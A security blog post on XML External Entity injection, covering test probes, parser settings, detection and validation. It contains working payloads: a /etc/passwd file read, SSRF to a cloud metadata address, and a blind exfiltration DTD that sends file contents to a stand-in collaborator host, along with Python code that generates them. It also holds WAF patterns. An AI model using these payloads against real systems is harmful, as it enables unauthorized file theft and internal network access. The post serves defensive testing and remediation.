XXE Injection: Find It, Fix It, Verify It
XML External Entity bugs persist because many XML parsers still ship insecure defaults. Here's how authorized testers prove file read and blind out-of-band (OOB) exfiltration, and the parser-by-parser settings that close the door.
By Arjun Raghavan, Security & Systems Lead, BIPI · December 26, 2024 · 7 min read
XML External Entity injection looks dated but still pays out four-figure bounties because legacy parsers in Java, Python, and PHP keep DTD processing on by default. SAML, SOAP, DOCX import, SVG upload, and RSS feed parsing remain the highest-yield surfaces.
How to test for it
Capture any request whose Content-Type is application/xml, text/xml, or application/soap+xml, along with requests to any endpoint that accepts SVG, DOCX, XLSX, or SAML responses. In Burp Repeater, prepend a DOCTYPE declaration that defines an external entity, then reference that entity inside an existing element value.
- File read probe: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> then &xxe; in a value field.
- SSRF via XXE: swap the SYSTEM URI for http://169.254.169.254/latest/meta-data/.
- Blind XXE OOB: load an external DTD from your Collaborator that defines a parameter entity referencing file:// and exfiltrates via an HTTP GET.
- DoS probes: billion laughs and quadratic blowup payloads, run only inside a controlled lab.
- SVG XXE: upload an SVG with a DOCTYPE prologue and check whether thumbnailing triggers entity resolution.
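The file read and SSRF probes above can be generated rather than hand-edited. The following is a minimal sketch, assuming the captured body is a small, well-formed XML string; build_probe and its parameters are hypothetical names, and the regex-based injection is a convenience for simple bodies, not a general XML rewriter.

```python
import re


def build_probe(body, element, system_uri="file:///etc/passwd"):
    """Return `body` with an external-entity DOCTYPE added and `&xxe;`
    placed as the text of the first <element>. Hypothetical helper."""
    # Drop any existing XML declaration; a fresh one is emitted below
    # (the original encoding attribute is not preserved).
    body = re.sub(r"^\s*<\?xml[^>]*\?>\s*", "", body).lstrip()
    root = re.match(r"<([A-Za-z_][\w.:-]*)", body)
    if root is None:
        raise ValueError("body must start with its root element")
    doctype = f'<!DOCTYPE {root.group(1)} [<!ENTITY xxe SYSTEM "{system_uri}">]>'
    name = re.escape(element)
    # Match <element ...>text</element> where the content is plain text.
    pattern = re.compile(rf"(<{name}(?:\s[^>]*)?>)[^<]*(</{name}>)")
    injected, count = pattern.subn(
        lambda m: m.group(1) + "&xxe;" + m.group(2), body, count=1
    )
    if count == 0:
        raise ValueError(f"no <{element}> element with text content found")
    return f'<?xml version="1.0"?>\n{doctype}\n{injected}'


if __name__ == "__main__":
    captured = '<?xml version="1.0" encoding="UTF-8"?><order><id>42</id><note>hi</note></order>'
    print(build_probe(captured, "note"))
    # SSRF variant: same probe, different SYSTEM URI.
    print(build_probe(captured, "note", "http://169.254.169.254/latest/meta-data/"))
```

Paste the output into Repeater in place of the original body. Choose an element whose value is reflected in the response, otherwise the probe is effectively blind.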
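For blind cases, host an external DTD on your Collaborator that contains <!ENTITY % file SYSTEM "file:///etc/hostname"> and <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://collab/?x=%file;'>">, then reference %eval; followed by %exfil; to chain the parameter entities. The inner percent sign must be written as &#x25; because it sits inside an entity value, and the chain only works from an external DTD because parameter-entity references inside declarations are not allowed in the internal subset. The leaked content arrives in the Collaborator HTTP log.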
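The two pieces of the blind chain, the hosted DTD and the document that loads it, can be sketched as below. The function names and the collab.example host are hypothetical placeholders for your own Collaborator URLs. The inner percent sign is emitted as &#x25; so the nested declaration survives being stored in an entity value.

```python
def build_oob_dtd(callback_base, file_uri="file:///etc/hostname"):
    """Text of the external DTD to host on the callback server (hypothetical helper)."""
    return (
        f'<!ENTITY % file SYSTEM "{file_uri}">\n'
        # &#x25; is an escaped '%': the nested declaration is only
        # materialised when %eval; is expanded.
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{callback_base}/?x=%file;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


def build_trigger(dtd_url):
    """Request body that makes the target parser fetch the hosted DTD."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY % ext SYSTEM "{dtd_url}"> %ext;]>\n'
        "<foo/>"
    )


if __name__ == "__main__":
    # collab.example stands in for your Collaborator hostname.
    print(build_oob_dtd("http://collab.example"))
    print(build_trigger("http://collab.example/x.dtd"))
```

A single-line target such as /etc/hostname keeps the exfiltration URL valid. Multi-line files usually break the request, because newlines are not legal in a URL.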
Common unsafe parsers
Python lxml with resolve_entities=True (the default before lxml 5.0), Java's default DocumentBuilderFactory, PHP builds linked against libxml2 older than 2.9.0, .NET XmlDocument and XmlTextReader on Framework versions before 4.5.2, and Ruby's Nokogiri when called with Nokogiri::XML::ParseOptions::DTDLOAD or NOENT all process external entities unless explicitly hardened.
Detection
Watch for outbound DNS or HTTP from XML parser worker processes to anything other than the application's known dependency hostnames. WAF rules on body content matching <!DOCTYPE.*SYSTEM or <!ENTITY catch the loud cases. At the parser level, instrument an EntityResolver that logs every external entity request, then alert on any non-empty log line in production.
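For Python services, the closest standard-library counterpart to a logging EntityResolver is expat's ExternalEntityRefHandler hook. This is a minimal sketch under that assumption; the function name and logger name are hypothetical. The handler records each request and returns 1 so parsing continues without fetching anything.

```python
import logging
import xml.parsers.expat

log = logging.getLogger("xml.entity_audit")  # hypothetical logger name


def parse_with_entity_audit(data):
    """Parse `data` and return the system IDs of every external general
    entity the document referenced. Nothing is ever fetched."""
    requested = []
    parser = xml.parsers.expat.ParserCreate()

    def on_external_ref(context, base, system_id, public_id):
        requested.append(system_id)
        log.warning(
            "external entity requested: system_id=%r public_id=%r",
            system_id, public_id,
        )
        return 1  # non-zero: carry on parsing without resolving the entity

    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)
    return requested


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    probe = (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
        b"<foo>&xxe;</foo>"
    )
    print(parse_with_entity_audit(probe))
```

Any warning from this logger in production means a client sent a document that tried to pull in an external resource, which is the condition worth alerting on.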
Remediation by stack
- Java JAXP: dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true), plus dbf.setFeature("http://xml.org/sax/features/external-general-entities", false) and dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false).
- Python lxml: parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False).
- Python defusedxml: replace xml.etree, xml.dom, and xml.sax imports with defusedxml equivalents across the codebase.
- PHP: call libxml_disable_entity_loader(true) on PHP 7. On PHP 8 that function is deprecated, so the control is to never pass LIBXML_DTDLOAD or LIBXML_NOENT to the loader.
- .NET: XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null }.
- Node libxmljs2: pass { noent: false, dtdload: false, dtdvalid: false } to parseXml.
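The same explicit, deny-by-default pattern can be shown with Python's standard-library xml.sax, used here as a stdlib-only analogue of the settings above rather than a replacement for the lxml or defusedxml guidance. Python 3.7.1 and later already default external general entities to off; setting the features explicitly documents the intent and protects against older runtimes. TextCollector and parse_hardened are hypothetical names.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    feature_external_ges,
    feature_external_pes,
)


class TextCollector(ContentHandler):
    """Collects character data so callers can inspect what was parsed."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_hardened(data):
    """Parse untrusted bytes with external entities explicitly disabled
    and return the concatenated text content."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # no external general entities
    parser.setFeature(feature_external_pes, False)  # no external parameter entities
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(data))
    return "".join(handler.chunks)


if __name__ == "__main__":
    probe = (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
        b"<foo>&xxe;</foo>"
    )
    # The entity reference is skipped, so no file content appears.
    print(repr(parse_hardened(probe)))
```

This configuration silently ignores the entity instead of rejecting the document. Where the input format never needs a DTD, refusing the DOCTYPE outright is the stricter choice.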
Validation
Re-run the file:// and OOB probes. Add a unit test that feeds a known XXE payload to your XML entry points and asserts the parser raises a DTD-forbidden exception. Run nuclei with -t http/vulnerabilities/generic/xxe.yaml across staging. Track parser library versions in your SBOM and gate CI on a minimum version that ships safe defaults.
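A regression test of the kind described above might look like the following sketch. It is stdlib-only so that it runs anywhere: parse_untrusted and DTDForbidden are hypothetical stand-ins for your real XML entry point and its exception. If the codebase uses defusedxml, parsing with forbid_dtd=True and asserting on defusedxml.DTDForbidden plays the same role.

```python
import unittest
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def parse_untrusted(data):
    """Hypothetical entry point: rejects any document that declares a DTD."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


XXE_PAYLOAD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<foo>&xxe;</foo>"
)


class XXERegressionTest(unittest.TestCase):
    def test_doctype_is_rejected(self):
        with self.assertRaises(DTDForbidden):
            parse_untrusted(XXE_PAYLOAD)

    def test_plain_xml_still_parses(self):
        # Guards against a fix that breaks legitimate traffic.
        parse_untrusted(b"<foo>ok</foo>")
```

Run it with python -m unittest alongside the rest of the suite, and add one test case per XML entry point so a newly introduced parser cannot slip through unhardened.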
Our team has remediated XXE in SAML implementations, document conversion pipelines, and SCAP scanners. The fix is always the same parser flag, but finding every parser instance across a polyglot codebase is what takes the time.
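A first pass at that inventory can be automated with a pattern scan. The sketch below is a starting point only: the pattern list is an illustrative assumption covering the stacks named in this article, not an exhaustive catalogue, and scan_text and scan_tree are hypothetical names.

```python
import re
from pathlib import Path

# Illustrative, non-exhaustive identifiers that usually indicate XML parsing.
PARSER_PATTERNS = {
    "Java JAXP": re.compile(r"\b(?:DocumentBuilderFactory|SAXParserFactory|XMLInputFactory)\b"),
    "Python": re.compile(r"\b(?:etree\.XMLParser|etree\.fromstring|minidom\.parseString|xml\.sax)\b"),
    "PHP": re.compile(r"\b(?:simplexml_load_string|DOMDocument)\b"),
    ".NET": re.compile(r"\b(?:XmlDocument|XmlTextReader|XmlReaderSettings)\b"),
    "Ruby": re.compile(r"\bNokogiri::XML\b"),
    "Node": re.compile(r"\blibxmljs2?\b"),
}


def scan_text(text):
    """Return (line_number, stack, stripped_line) for each line that
    mentions a known parser identifier."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for stack, pattern in PARSER_PATTERNS.items():
            if pattern.search(line):
                hits.append((number, stack, line.strip()))
    return hits


def scan_tree(root):
    """Walk a source tree and yield (path, line_number, stack, line)."""
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="ignore")
        for number, stack, line in scan_text(text):
            yield path, number, stack, line


if __name__ == "__main__":
    for path, number, stack, line in scan_tree("."):
        print(f"{path}:{number}: [{stack}] {line}")
```

Each hit is a place to confirm the hardening flags by hand. The scan finds candidates; it does not prove that a parser is safe or unsafe.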